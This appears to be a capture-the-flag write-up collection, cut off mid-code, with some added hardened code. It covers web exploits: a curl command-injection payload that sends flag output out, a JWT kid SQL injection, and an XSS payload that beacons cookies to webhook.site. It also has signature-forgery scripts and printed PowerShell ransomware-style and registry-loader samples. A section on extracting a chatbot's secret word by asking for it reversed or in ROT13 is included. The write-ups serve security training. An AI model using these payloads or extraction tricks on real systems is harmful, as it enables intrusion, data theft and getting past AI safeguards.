# WEB - Apostles Of IoT
registered a user, gathered user id (14)
modified poc from https://starlabs.sg/blog/2023/09-analysis-of-nodebb-account-takeover-vulnerability-cve-2022-46164/
commented out user.getUserByUsername because it was not working and hardcoded the userid [14]
```python
    # get UID of registered user
    # sio.emit("user.getUserByUsername", username, callback=findUser)
    # sleep(1)
    # make user admin
    sio.emit("admin.user.makeAdmins", [14])
    sleep(1)
    sio.disconnect()
    return username, password
```
ran it and got admin privs on my account -> flag
# WEB - Phrase Keeper
1.) register and login
2.) add session = cookie of login
3.) change password of admin using graphql with authenticated session
4.) /admin/export?filename=$(curl http://ourendpoint?\`/readflag\`)
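Added example (mine, not the challenge's code): the step 4 payload works because the export filename reaches a shell, where `$(...)` and backticks are substituted before the command runs. The handler below is an assumed illustration: the string-built variant has that shape, the hardened variant validates the name and builds an argv list so no shell is involved, and `shlex.quote` covers the case where a shell is unavoidable. The export directory, the `zip` command and the function names are assumptions.

```python
import re
import shlex

EXPORT_DIR = "/srv/exports"  # assumed location of the export data
# Allowlist for export names: alphanumerics, dot, underscore, dash; no leading dot.
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

# The request parameter from the write-up, kept here as the test input.
PAYLOAD = "$(curl http://ourendpoint?`/readflag`)"


def export_command_vulnerable(filename):
    # Illustrative injectable shape: the whole string goes to /bin/sh, which
    # performs $(...) and backtick substitution before zip ever runs.
    return f"zip -r {EXPORT_DIR}/{filename}.zip {EXPORT_DIR}/data"


def is_safe_export_name(filename):
    return isinstance(filename, str) and SAFE_NAME.fullmatch(filename) is not None


def export_command_hardened(filename):
    """Return an argv list for subprocess.run(argv) (shell=False), or None."""
    if not is_safe_export_name(filename):
        return None
    # Each element is one argument; nothing is ever parsed by a shell.
    return ["zip", "-r", f"{EXPORT_DIR}/{filename}.zip", f"{EXPORT_DIR}/data"]


def export_command_quoted(filename):
    # If a shell is unavoidable, quoting turns the name into one literal word;
    # it still needs is_safe_export_name() to stop path traversal.
    return f"zip -r {shlex.quote(f'{EXPORT_DIR}/{filename}.zip')} {EXPORT_DIR}/data"


if __name__ == "__main__":
    print(export_command_vulnerable(PAYLOAD))
    print(export_command_hardened(PAYLOAD))
    print(shlex.split(export_command_quoted(PAYLOAD)))
```

`shlex.split` on the quoted form shows the whole payload arriving as a single argument instead of being evaluated.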
# WEB - Majestic Sales
SQL injection in the kid field of the JWT header.
```json
{
  "alg": "HS256",
  "typ": "JWT",
  "kid": "22' UNION SELECT 1,2,3,'krocan' --"
}
```
This header sets the secret key of the token to the value "krocan".
```json
{
  "username": "admin",
  "tenant": "uk_office",
  "iat": 1698159149
}
```
Next you put this payload inside the JWT and sign it with the "krocan" secret key.
The vulnerability was in the getAppKey function in database.js.
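Added example (mine, not the challenge's source): why the kid injection hands the token its own signing secret, and what the lookup looks like once fixed. The key table, its values and the key id 7 are assumptions; the challenge's getAppKey is not on the page, so `get_app_key_vulnerable` only reproduces the shape of a string-built query. The token is built from the header and payload shown above and checked against both lookups.

```python
import base64
import hashlib
import hmac
import json
import sqlite3

# Constructed in-memory stand-in for the application's key table
# (schema and values are assumptions, not the challenge's database).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE app_keys (id INTEGER PRIMARY KEY, tenant TEXT, name TEXT, secret TEXT)")
conn.execute("INSERT INTO app_keys VALUES (7, 'uk_office', 'primary', 'real-server-secret')")
conn.commit()

PAYLOAD_KID = "22' UNION SELECT 1,2,3,'krocan' --"  # kid from the write-up


def get_app_key_vulnerable(kid):
    # Illustrative injectable shape: kid is spliced into the SQL text, so the
    # UNION in PAYLOAD_KID appends a row whose 4th column is attacker-chosen.
    row = conn.execute(
        f"SELECT id, tenant, name, secret FROM app_keys WHERE id = '{kid}'"
    ).fetchone()
    return row[3] if row else None


def get_app_key_hardened(kid):
    # Bound parameter plus a strict shape check: kid is data, never SQL.
    if not isinstance(kid, str) or not kid.isdigit():
        return None
    row = conn.execute("SELECT secret FROM app_keys WHERE id = ?", (int(kid),)).fetchone()
    return row[0] if row else None


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_token(header, payload, secret):
    # Minimal HS256 JWT encoder, used only to build test inputs.
    h = b64url(json.dumps(header, separators=(",", ":")).encode())
    p = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url(sig)}"


def verify_hs256(token, lookup):
    """Return the payload if the token verifies under lookup(kid), else None."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None
    secret = lookup(str(header.get("kid", "")))
    if secret is None:
        return None
    expected = hmac.new(secret.encode(), f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


# Header and payload from the write-up, signed with the injected secret.
FORGED_TOKEN = make_token(
    {"alg": "HS256", "typ": "JWT", "kid": PAYLOAD_KID},
    {"username": "admin", "tenant": "uk_office", "iat": 1698159149},
    "krocan",
)
# A legitimate token for comparison (constructed; kid 7 is the assumed real key).
LEGIT_TOKEN = make_token(
    {"alg": "HS256", "typ": "JWT", "kid": "7"},
    {"username": "seller", "tenant": "uk_office"},
    "real-server-secret",
)


def demo():
    return {
        "vulnerable_accepts": verify_hs256(FORGED_TOKEN, get_app_key_vulnerable) is not None,
        "hardened_accepts": verify_hs256(FORGED_TOKEN, get_app_key_hardened) is not None,
    }


if __name__ == "__main__":
    print(demo())
```

The fix is the parameterised query; the `isdigit()` check is belt-and-braces so that a kid which is not a key id never reaches the database at all.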

# WEB - Radiation Relics
To get access to an account:
```
POST /graphql HTTP/1.1
Host: 94.237.59.206:56494
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://94.237.59.206:56446/login
Content-Type: application/json
Content-Length: 194
Origin: http://94.237.59.206:56446
Connection: close
{"query":"mutation($username: String!, $password: String!) { UpdatePassword(username: $username, password: $password) { message, token } }","variables":{"username":"seller315","password":"dsa"}}
```
To trigger XSS on the bot:
```
POST /api/products/add HTTP/1.1
Host: 94.237.59.206:56446
Content-Length: 650
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://94.237.59.206:56446
Referer: http://94.237.59.206:56446/dashboard
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InNlbGxlcjMxNSIsImlhdCI6MTY5ODE1NDY3OX0.u4pDVRZnBZg-bnZv-ecLPN2EXyhQvUp3QGbUbYPLoWE
Connection: close
{"product_name":"33","product_desc":"asd<a id=pepe href='https://webhook.site/aa22c38a-10ed-41af-ade1-e1d0a8ee3258/'></a><img name=productCategories src=mal id=x /><img name=productCategories src=\"mal'onerror='navigator.sendBeacon(pepe,document.cookie)\" id=1 />","product_price":"11","product_category":"1","product_keywords":"0;data:text/html;base64,PHNjcmlwdD5wcm9tcHQoIlJlZmxlY3RlZCBYU1MgQnkgUHJpYWwiKTwvc2NyaXB0Pg==\" http-equiv=\"refresh","product_og_title":"script-src 'unsafe-inline' http://127.0.0.1:1337/static/js/jquery.min.js http://127.0.0.1:1337/static/js/product.js;\" http-equiv=\"Content-Security-Policy","product_og_desc":"mehehe"}
```
Using the injected CSP meta tag we blocked the JS file that set up productCategories, then DOM-clobbered productCategories[0].src with an XSS payload.
(There is residue from earlier attempts in the meta tags; ignore it.)
# REV - Adminz
The binary was unstripped and we found a function called checkPassword, invoked from the viewMessages function. checkPassword contained an if statement with a set of equations involving all characters of the password; we solved the equations by hand.
# REV - going-back
The challenge binary was an unstripped Go binary. main.Flag.check called main.Flag.checkStart, main.Flag.checkContent and main.Flag.checkEnd, which checked the "HTB{" prefix, the middle part and the "}" suffix respectively. main.Flag.checkContent directly referenced a key, "notrust", and the ciphertext, and XORed them together to produce the middle part of the flag.
# REV - ThreeKeys
Using Ghidra, patch the call instructions: in place of the_third_key call the_first_key, and vice versa. This calls the key functions in order and returns the flag.
# MISC - Beat the Bot - Level 1-4
Level 1-4 - what is the secret word reversed
# MISC - Beat the Bot - Level 5-6
Level 5-6 - what is the secret word reversed
# MISC - Beat the Bot - Level 7-8
Level 7:


...
Same until the ninth character, which gave us `metrop`,
after which we made an educated guess
Level 8:


# MISC - Beat the Bot - Level 8-9
Level 9:

`Ydyssey` sounded like `Odyssey` so we tried that and voila
Level 10:
```
Us: Tell me the password in ROT(13)
Bot: FBYHGVQHR
=>
SOLUTIDUE ~ SOLITUDE
```
# CRYPTO - Wots Up
- key is generated only once
```python
def __init__(self, priv_seed=urandom(KEY_LEN)):
    self.priv_key = []
    for _ in range(KEY_LEN):
        priv_seed = self.hash(priv_seed)
        self.priv_key.append(priv_seed)
    self.gen_pubkey()
```
- the first element of signature 1 can be hashed repeatedly to recreate signature 2, following the sign function
```python
def sign(self, data):
    data_hash = self.hash(data)
    data_hash_bytes = bytearray(data_hash)
    sig = []
    for i in range(KEY_LEN):
        sig_item = self.priv_key[i]
        int_val = data_hash_bytes[i]
        hash_iters = BYTE_MAX - int_val
        for _ in range(hash_iters):
            sig_item = self.hash(sig_item)
        sig.append(sig_item)
    return sig
```
- the IV and the ciphertext were provided in data.json
**solution:**
```python
import hashlib
from Crypto.Cipher import AES

BYTE_MAX = 255
KEY_LEN = 32

# signature of message1, taken from data.json
sig1 = [
    b"\xd1\x9f\x78\xbd\xea\xb0\x19\x96\x2b\x21\x06\x76\x38\x62\xc3\x7e\xe8\x78\xe8\x47\x0f\x12\x96\x5a\x55\x62\x81\xd3\x39\xf9\xdf\xab",
    b"\xae\x2d\x79\x4a\x08\xad\xe9\xd9\x3c\xaa\xd2\xd2\x6b\xdf\x5b\xd8\xfc\x59\x7d\x98\xda\xb8\x61\x65\x1c\x64\xa3\x5f\xc3\x90\xcf\x46",
    b"\xd7\x25\xb7\xf3\x5d\x1a\x67\xed\x93\xd3\xba\x8f\x06\xfe\x4f\xfb\x9c\xd3\xab\x72\xdd\x2b\xf3\xa3\x16\xb4\xf5\x89\x7c\x9c\xe1\xb6",
    b"\xce\xfa\xd6\x71\xfc\xc6\xfe\x9b\xaa\xaf\x79\x3f\xe0\x64\x6d\x36\x44\xe3\xdc\x00\x57\x31\x8e\xca\x3d\x0d\x8e\x02\xc3\x70\x23\x84",
    b"\x65\xe6\x64\xa6\x1d\x33\x13\xa7\xc0\x78\xc2\x69\x80\x66\xdb\x29\x0a\xfb\xcd\x4a\x62\x78\xe4\x06\x2a\xf5\xb2\xd9\x90\x32\xd6\xd8",
    b"\x9b\xe3\x78\xf4\x51\x0c\x4b\xdc\xce\xce\x16\xb0\x31\x46\x60\x7d\xef\xaa\x3d\x4b\x14\xd2\xd4\x49\x7a\x3c\x37\x2a\x91\xdb\xc0\xf9",
    b"\x74\x57\x83\x7e\xb8\xe8\xd1\x21\xaf\xc4\x3f\x53\xa7\x03\xdc\x54\x0b\x38\x99\x3f\xc0\x74\x68\x0e\x2a\xeb\x26\x66\xc1\xd1\x07\x78",
    b"\x3e\x66\x7e\x4a\x5f\x21\xda\x53\x55\x7f\x8b\xa5\x5b\x09\x82\x4f\xe5\x9e\x29\x98\xea\xcc\x7b\x5f\xfe\x21\x69\x40\xea\x6d\x40\x60",
    b"\x9d\x72\x7c\xf5\xb0\xf4\x3c\xfb\xfc\x08\x55\x55\x83\xc0\x37\x43\x0d\xf6\x67\x15\x22\xa9\x66\x48\x79\xd9\xea\x85\x91\x4c\xf5\xd9",
    b"\x65\xf3\x03\xf9\xa0\x47\xa9\x2f\xef\x31\xc4\x20\x27\x83\x74\x1f\xf7\xf5\x88\x13\xbf\x73\x51\xce\xe8\x27\x53\xbc\xb1\xdb\x5f\xd5",
    b"\xcc\xc4\x04\xf3\x44\x33\x28\xf1\xa0\x17\x37\xe4\x3b\x86\x16\x22\x24\xcd\xe4\x62\xcb\xd7\xb3\x95\xae\x89\x67\xbe\xd7\xeb\xcf\xc3",
    b"\x3a\xb4\x39\xe4\x19\x82\xcd\x36\x6b\xde\xdf\x5b\xed\x2e\xa9\xf6\x0f\x54\x6d\x78\x8d\x76\xcd\x78\x25\x52\x24\x83\x20\x21\xce\xd5",
    b"\xa7\xe2\x77\xc5\x97\xee\xd3\x41\xf0\x84\xc7\x2f\x41\xf0\xd9\x82\x34\x18\xab\x9d\x09\x28\xbd\xc8\xc1\x5b\x35\x02\x8f\xf7\x7d\x41",
    b"\x99\x39\xcd\xb7\xdc\x45\xfc\x8f\xe6\x82\x27\xfc\xef\xc2\x27\x13\x3b\xc6\x7d\x29\x51\x45\xd4\x05\x2b\x2a\xaa\x79\x2f\x8a\x17\x7d",
    b"\x01\xc0\x3a\x68\xb7\xe5\x71\x2a\x9b\x13\x50\x49\x8b\x1d\xb0\xf6\xcd\x88\x81\x93\xa2\xf6\x59\x0d\x37\x7e\x8b\xfd\xf0\x28\x9e\x81",
    b"\x05\x3a\x2a\x24\xc3\x0e\xf3\xa0\x8a\x15\x06\x14\xf5\x8a\x53\x89\xdd\x2a\x96\x6f\xbe\x1d\xb8\x33\x1a\x98\x5e\x1e\x4d\x61\x87\x6d",
    b"\x53\x71\xbe\xb7\xbd\x86\x87\xd6\x5f\xda\x30\xaa\xa7\x20\x81\xe0\x7e\x60\x37\xb5\x90\x11\x0b\x28\x89\x8f\x6a\x49\x54\x1e\x56\x85",
    b"\x7a\x77\x9a\xb5\x02\xda\x64\x0b\x2f\x3e\x4a\x47\x74\xaa\x94\x88\xe5\x6f\x21\xad\x0e\xd6\x9b\xea\xc6\xf0\x23\x8d\xb1\xe5\x6c\x42",
    b"\x8f\x3e\xe7\x74\x68\x11\x41\x36\x6c\x51\x6c\x37\x25\x29\x03\xf4\x23\xc8\x3e\xb3\x2f\xb0\x8a\x46\xb7\x2d\xdd\xda\x3d\x81\xb5\xf5",
    b"\x0f\x9f\xfd\x34\x86\xc9\xd9\xe3\x50\xc0\xd4\xc9\x8a\x84\xce\x90\xc5\x82\x8f\x2e\x8b\xb4\x84\x5a\x7c\x2a\x4a\xb7\x5a\x62\xd8\x1c",
    b"\x42\x4c\xf8\x9a\x80\xc4\xb7\x14\x77\xb2\x69\x44\xfc\xeb\x92\xd9\x0d\x3b\x20\x48\xbd\xca\x26\x06\x94\x80\x17\x55\xb1\xe3\x8f\xcf",
    b"\x3a\x29\xc0\xf9\x3f\x75\x60\xb8\x25\xfe\x25\x5d\xa5\x19\x89\xbb\x44\xe0\x8c\xa6\x14\x8b\x7c\x06\x87\x79\xfd\xde\xee\x87\x6d\x70",
    b"\x3a\xd5\x5d\x82\x30\x0e\xf8\x6e\x73\x9e\x76\xd4\x80\x6b\x5f\x3b\x6f\x19\x5f\xd9\x8d\x35\x82\x67\x9a\x98\xec\xf5\x56\xb7\x8f\x2a",
    b"\x22\x3a\x85\xbf\x2b\x49\x01\x8b\xb9\x03\x7b\x8a\x50\x9e\xee\x76\x5a\x98\xff\xc7\x5e\xae\xeb\x3d\x3e\xd8\xf6\x4b\xb7\x97\x26\xac",
    b"\xac\x43\x11\x33\x01\x74\x84\x44\x84\x3b\x9c\x66\xf9\x98\x94\xd2\x3a\x42\x5a\xb3\x3c\x61\xc1\xfd\x0c\x85\xc3\xdd\x5a\xf0\x5e\x49",
    b"\x4a\x9d\xb2\xad\x91\xd1\x8b\x34\x7e\x72\x47\x6a\x5d\x33\xbc\x99\xbf\x90\xec\xa1\xaf\x3c\x65\xbf\xa3\x07\x32\x6c\x0d\x0b\xf7\x81",
    b"\x05\x22\x78\x56\xc1\x68\xca\x03\xd2\x72\xe7\x7b\x61\x0f\x1a\x9c\xf8\x84\xe5\x78\xf7\x14\x47\x4d\xd2\x9a\x23\xc4\xa3\xb0\x15\x2e",
    b"\x3c\x7d\xd2\x1f\xde\xd8\x96\xf7\x88\x71\x9b\x14\x42\xed\xed\x5b\x2d\x4c\x9d\xfa\x38\x96\xf5\x73\xb4\xc0\x1a\x38\x8e\x5d\xfe\xdc",
    b"\x8a\x50\x4c\x95\x85\xfa\x04\x45\xaa\x26\xd2\x1e\xd5\xbc\xe5\x91\xe4\x42\xc6\x55\x9b\x50\x3c\x8f\x15\x69\x7b\xbe\x94\x7c\xd6\xa1",
    b"\x4a\x9d\xb2\xad\x91\xd1\x8b\x34\x7e\x72\x47\x6a\x5d\x33\xbc\x99\xbf\x90\xec\xa1\xaf\x3c\x65\xbf\xa3\x07\x32\x6c\x0d\x0b\xf7\x81",
    b"\x8b\xf4\x64\xf1\x19\x47\xc8\x91\x4a\x31\x85\xcf\x40\xdc\xbf\x95\xce\x30\xbd\x9e\x90\xbe\xf0\x87\xf8\x6b\x5f\x17\x5b\x55\x5a\xb6",
    b"\x51\x28\x5f\x75\xff\xca\x5e\xf6\x9c\x73\x31\xd3\xf9\x0a\xbe\x84\x62\x8a\x37\x9e\x25\x74\x7f\x8d\x4b\xc8\x1f\xbc\x6e\x77\x07\xa2",
]


def hash(data):
    return hashlib.sha256(data).digest()


def sign(data, arr):
    # mirrors the challenge's sign(): record how many times each chain element
    # is hashed for this message (BYTE_MAX minus the corresponding hash byte)
    data_hash_bytes = bytearray(hash(data))
    for i in range(KEY_LEN):
        int_val = data_hash_bytes[i]
        hash_iters = BYTE_MAX - int_val
        arr.append(hash_iters)


message1 = b"WOTS Up???"
message2 = b"Sign for flag"
print(hash(message1))
print(hash(message2))

data1 = []
data2 = []
sign(message1, data1)
sign(message2, data2)

# priv_key[i] is i hashes past priv_key[0] (one single chain); the solution
# treats sig1[0] as the start of that chain, so sig2[i] is data2[i] + i hashes
# further along it
sig2 = []
for i in range(len(sig1)):
    tmp = sig1[0]
    for j in range(data2[i] + i):
        tmp = hash(tmp)
    sig2.append(tmp)

# the AES key is the first byte of each signature element
aes_key = bytes([s[0] for s in sig2])
print(aes_key)

# ciphertext and IV from data.json
flag = b"\x0d\x1f\xcc\xda\xb4\x60\x67\x0b\x32\xc3\x2f\xc6\x08\x06\xa0\x60\x6e\x01\xc1\x70\x7f\x2b\x28\x26\x47\xb5\x1f\x21\x26\xd8\xfd\x6f"
aes_iv = b'\x27\x1c\x15\x3f\xa0\x2b\xe8\x1b\x26\x85\x69\x0d\x81\x73\xc3\x6e'
cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)
decrypted = cipher.decrypt(flag)
print(decrypted)
```
# CRYPTO - Wots Up2
- similar to Wots Up
- key was generated for each signature entry
```python
def __init__(self):
    self.priv_key = []
    for _ in range(KEY_LEN):
        priv_seed = urandom(KEY_LEN)
        self.priv_key.append(priv_seed)
    self.gen_pubkey()
```
- for each position we picked, across all the provided signatures, the element with the lowest hash-iteration count
- from there we could hash forward to the higher iteration count the target message needs
- then we used the same procedure as in the first challenge
**solution:**
```python
import hashlib
import json
from Crypto.Cipher import AES

BYTE_MAX = 255
KEY_LEN = 32

with open('data.json', 'r') as file:
    file_data = json.load(file)
signatures = file_data['signatures']

# public key of the account whose signature we need to produce
pub_key0 = bytes.fromhex("6df32bef41a3a6242af1702da255d01baf84ebcf9a6a310d8ca90760c0579f28")


def hash(data):
    return hashlib.sha256(data).digest()


def sign(data, arr):
    # mirrors the challenge's sign(): record how many times each chain element
    # is hashed for this message (BYTE_MAX minus the corresponding hash byte)
    data_hash_bytes = bytearray(hash(data))
    for i in range(KEY_LEN):
        int_val = data_hash_bytes[i]
        hash_iters = BYTE_MAX - int_val
        arr.append(hash_iters)


# hash counts the target message requires at every position
sig2Iters = []
message2 = f"{pub_key0.hex()} sent 999999 WOTScoins to me".encode()
sign(message2, sig2Iters)
print(sig2Iters)

# for every position keep the signature element with the fewest hash iterations
# (closest to the private key); 500 is a sentinel above BYTE_MAX
bases = {x: ("", 500) for x in range(32)}
for entry in signatures:
    sig1Iters = []
    sign(entry['message'].encode(), sig1Iters)
    sig1 = entry['signature']
    for j, count in enumerate(sig1Iters):
        if bases[j][1] > count:
            bases[j] = (sig1[j], count)

# hash each base forward to the iteration count the target message needs
sig2 = []
for key, (element_hex, count) in bases.items():
    tmp = bytes.fromhex(element_hex)
    for _ in range(sig2Iters[key] - count):
        tmp = hash(tmp)
    sig2.append(tmp)

aes_key = bytes([s[0] for s in sig2])

# ciphertext and IV from data.json
flag = bytes.fromhex("6222d526df3e3b38b8efff531ddfc2ba370d1ed0010c98ef83c542c1f2f77d66")
aes_iv = bytes.fromhex("a73f83b7c65be39e8129125151c1fee5")
cipher = AES.new(aes_key, AES.MODE_CBC, aes_iv)
decrypted = cipher.decrypt(flag)
print(decrypted)
```
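Added example (mine, not the challenge's code), covering both Wots Up and Wots Up2: a toy WOTS with sign/verify and the reuse procedure the two solutions apply, generalised to any number of signatures under one key. The chain layout (one independent chain per byte position, `sig[i] = H^(255-h[i])(priv[i])`, `pub[i] = H^255(priv[i])`) and the seed-derived private key are assumptions, since gen_pubkey is not shown on the page. The point for a defender is in `forge_from_reused_key`: a signature for a new message is reproducible at every position where some known element sits at or before the position the new message needs, and `verify` cannot distinguish the result from an honest signature. That is why a one-time key must be used exactly once; stateful hash-based schemes such as XMSS exist to enforce that.

```python
import hashlib

BYTE_MAX = 255
KEY_LEN = 32


def H(data):
    return hashlib.sha256(data).digest()


def hash_n(data, n):
    # Walk n steps along a hash chain.
    for _ in range(n):
        data = H(data)
    return data


def keygen(seed):
    # Assumed layout: one independent chain per byte position (as in Wots Up2);
    # pub[i] is the end of chain i.
    priv = [H(seed + bytes([i])) for i in range(KEY_LEN)]
    pub = [hash_n(p, BYTE_MAX) for p in priv]
    return priv, pub


def chain_positions(message):
    # Element i of a signature sits (255 - h[i]) steps from priv[i]; this is
    # the hash_iters loop in the challenge's sign().
    return [BYTE_MAX - b for b in H(message)]


def sign(priv, message):
    return [hash_n(priv[i], n) for i, n in enumerate(chain_positions(message))]


def verify(pub, message, sig):
    # From position (255 - h[i]) another h[i] steps must land on pub[i].
    digest = H(message)
    for i, element in enumerate(sig):
        if element is None or hash_n(element, digest[i]) != pub[i]:
            return False
    return True


def forge_from_reused_key(signed, target):
    """signed: (message, signature) pairs all produced with the same key.
    Returns (signature for target, positions that could not be covered).
    Position i is coverable when a known element sits at or before the
    target's position on chain i; hashing it forward by the difference gives
    exactly the element an honest signer would produce."""
    want = chain_positions(target)
    forged, missing = [], []
    for i in range(KEY_LEN):
        # Wots Up2 step: the element closest to the private key is the best base.
        base_msg, base_sig = min(signed, key=lambda ms: chain_positions(ms[0])[i])
        have = chain_positions(base_msg)[i]
        if have > want[i]:
            forged.append(None)  # would require walking the chain backwards
            missing.append(i)
        else:
            forged.append(hash_n(base_sig[i], want[i] - have))
    return forged, missing


if __name__ == "__main__":
    priv, pub = keygen(b"constructed seed, not the challenge's key")
    seen = [(m, sign(priv, m)) for m in (b"WOTS Up???", b"Sign for flag")]
    target = b"some third message"
    forged, missing = forge_from_reused_key(seen, target)
    print("uncoverable positions:", missing)
    print("forged signature verifies:", verify(pub, target, forged))
```

With a single reused signature many positions are typically uncoverable; the more signatures made under one key, the smaller `missing` gets, which is the effect the second challenge exploits.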
# FORENSICS - Cash Me Ousside
```
A public-facing web server was compromised and files were lost. Can you help us to understand the situation?
```
```
echo [StRinG]( '36S107,101<121r32j61S32j36>40S119,104r111j97E109,105S41M13>10p36<105E70M105<108,101E32<61r32S34F67,58>92p68>111r99<117r109<101F110,116>115>92<67F114r101r100j101r110<116E105>97F108j115>46>120E108>115M120,34F13r10,36p111E70F105j108,101j32>61S32F36r105S70>105E108j101M32<43M32<34<46E111r117F116r34j13>10<36>98<121F116M101,115E32M61,32,91S83r121F115>116>101p109M46j73F79p46,70p105M108F101j93F58<58E82j101M97<100p65r108p108S66,121>116r101p115>40F34S36j105j70r105>108M101j34>41E13F10S32p13p10F102E111F114,40M36<105S61r48j59,32M36>105p32F45M108>116M32E36,98<121p116<101,115E46>99M111E117M110p116F32<59F32E36r105S43<43S41S13r10j123j13F10,36,98p121M116,101M115p91,36,105<93,32F61,32S36F98,121M116S101>115M91M36r105,93r32F45p98p120M111,114>32F36E107p101M121p91r36<105,37j36S107p101E121E46F76r101F110S103>116M104r93j13<10M125j13F10F13r10>91,83j121p115j116<101M109p46r73M79M46M77p101r109>111E114S121,83F116M114M101F97S109>93F32S36p111S117j116>112<117r116E32,61F32S78,101M119M45j79>98F106E101j99E116,32F83E121r115,116p101S109j46p73p79F46<77j101E109j111p114S121>83<116<114,101>97F109S13,10E36r103p122<105p112E83F116,114S101r97E109r32j61E32,78r101r119,45r79j98S106<101,99M116F32p83E121,115,116>101E109j46M73M79F46S67r111>109F112E114r101<115S115<105<111S110,46M71S122S105E112F83j116j114<101S97<109,32M36<111p117E116<112<117j116,44j32F40E91<73r79F46>67p111E109r112F114<101r115r115r105r111F110S46<67j111j109E112M114p101j115j115<105<111>110E77j111E100>101,93E58r58>67<111M109<112p114j101E115p115r41,13j10F36>103E122j105,112,83E116F114E101r97,109r46j87>114r105j116M101p40p36M98F121F116M101E115M44F32p48p44>32<36M98,121r116j101<115>46S76<101p110<103<116S104p41S13M10M36<103,122S105r112F83p116>114p101<97E109r46,67F108<111,115j101p40,41F13p10M36F111<117>116p112r117>116F46j67,108j111F115S101M40F41F13S10,36S116,109F112p32>61M32M36S111p117F116<112,117,116S46F84<111F65E114,114r97,121F40>41>32j13S10r36<101E110M99E32F61<32r91E67r111p110E118S101j114<116E93M58>58<84p111>66>97p115S101r54E52E83r116j114M105j110r
103>40E36j116<109E112r41,13p10j36,101E110,99<32S124F32,79p117<116j45p70r105p108p101F32j67>58S92<87,105M110<100F111E119p115E92<84j101j109r112M92M116j101E115M116F13E10j82S101E109p111M118S101E45F73j116E101p109E32M36,105r70>105F108<101'-SpLIt 'F'-SPLiT'S' -SPlit'<'-SPLit 'r' -spliT'E' -SPLiT'M' -SPLiT',' -SPlIt '>' -Split 'j' -split'p'|FoREach-OBJeCT{( [InT]$_-as[cHaR]) }) > out
```
```powershell
[StRinG]$key = $(whoami)
$iFile = "C:\Documents\Credentials.xlsx"
$oFile = $iFile + ".out"
$bytes = [System.IO.File]::ReadAllBytes("$iFile")
for($i=0; $i -lt $bytes.count ; $i++){$bytes[$i] = $bytes[$i] -bxor $key[$i%$key.Length]}
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
$gzipStream.Write($bytes, 0, $bytes.Length)
$gzipStream.Close()
$output.Close()
$tmp = $output.ToArray()
$enc = [Convert]::ToBase64String($tmp)
$enc | Out-File C:\Windows\Temp\test
Remove-Item $iFile
```
whoami = `nt authority\iusr`
> `HTB{c@ugh7_th3_bAd_guY!}`
# FORENSICS - Backup Instructions
```
I was told I had to upgrade the server at my new job. Since I haven't done this before I asked for some instructions but there were none available. But after scouring the web, I found some legitimate instructions that even could auto-verify/update themselves!! However, as soon as I opened the instruction file, my computer started acting really weird. I am so scared I messed something up... Please help me...
```
- run strings -> base64 decode -> extract injector.exe
- get flag:
```csharp
using System;
using System.Text;

public class Program
{
    private static readonly byte[] key = new byte[]
    {
        162, 213, 17, 123, 203, 58, 73, 96, 164, 109,
        204, 176, 167, 18, 146, 125
    };

    // repeating-key XOR of the embedded bytes with key
    public static string Unhide(byte[] byteArray)
    {
        byte[] result = new byte[byteArray.Length];
        for (int i = 0; i < byteArray.Length; i++)
        {
            result[i] = (byte)(key[i % key.Length] ^ byteArray[i]);
        }
        return Encoding.UTF8.GetString(result); // Use UTF-8 encoding
    }

    public static void Main(string[] args)
    {
        byte[] array = new byte[]
        {
            202, 161, 101, 11, 241, 21, 102, 3, 203, 3,
            170, 217, 192, 97, 188, 16, 203, 182, 99, 20,
            184, 85, 47, 20, 199, 1, 163, 197, 195, 97,
            247, 15, 212, 188, 114, 30, 184, 20, 42, 15,
            201, 87, 244, 128, 151, 34, 189, 31, 195, 182,
            122, 14, 187, 20, 43, 9, 202
        };
        byte[] array2 = new byte[]
        {
            234, 129, 83, 0, 188, 11, 39, 4, 148, 26,
            191, 239, 207, 38, 228, 78, 253, 183, 100, 74,
            167, 78, 120, 14, 251, 39, 159, 239, 213, 103,
            252, 9, 147, 184, 34, 90, 244, 101, 62, 40,
            144, 57, 237, 143, 134, 45, 239
        };
        string decodedString = Unhide(array2);
        Console.WriteLine(decodedString);
    }
}
```
> `HTB{w1nd0ws_h4v3_bu1lt1n_JS_runt1m3!?_wH4T!?!?}`
# FORENSICS - BabyAPT
```
Our organization was compromised in a recent attack and we weren't able to recover our files. Can you take a look at some artifacts that we gathered from an affected host?
```
- Registry Explorer findings:
```
C:\Users\Rick Ashley\OneDrive
$enc = (Get-ItemProperty -Path HKCU:\SOFTWARE\SecureSoft -Name Dat).Dat; [IO.File]::WriteAllBytes("$env:TEMP\c.exe", [Convert]::FromBase64String($enc)); iex $env:TEMP\c.exe
cmd /c "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe iex (Get-ItemProperty -Path HKCU:\SOFTWARE\SecureSoft\Old -Name Edit).edit"
csc://{S-1-5-21-1978928964-1933118282-3660793550-1001}/
```
```csharp
using System;
using System.IO;
using System.Security.Principal;
using System.Security.Cryptography;
using System.Text;

class Program
{
    public static void DecryptFile(string encryptedFile, string key)
    {
        // fixed IV
        byte[] array2 = new byte[]
        {
